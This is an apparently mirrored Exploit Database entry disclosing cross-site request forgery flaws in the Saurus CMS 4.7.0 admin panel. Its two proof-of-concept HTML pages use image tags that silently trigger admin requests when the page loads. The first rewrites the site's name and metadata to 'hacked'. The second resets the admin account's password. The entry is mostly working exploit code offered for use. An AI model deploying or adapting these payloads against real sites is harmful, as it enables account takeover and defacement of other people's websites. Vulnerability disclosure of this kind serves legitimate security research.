Saurus CMS Admin Panel – Multiple Cross-Site Request Forgery Vulnerabilities

• Exploit Database
• 53 阅读

• 作者： Fady Mohammed Osman
  日期： 2010-08-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14644/

• # Author: Fady Mohammed Osman (cute hacker)
  # Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz
  # Version: 4.7.0
  # Tested on: Ubuntu 10.04
  # CVE : [Not available]
  # This vulnerability allows a malicious hacker to change password of a user
  and also it allows changing the website information.
  
  PoC 1:
  
  <html>
  <head><title>Saurus CSRF : Change site information</title></head>
  <body>
  <img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">
  </body>
  </html>
  
  PoC 2:
  
  <html>
  <head><title>Saurus CSRF : Change user's password</title></head>
  <body>
  <img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">
  </body>
  </html>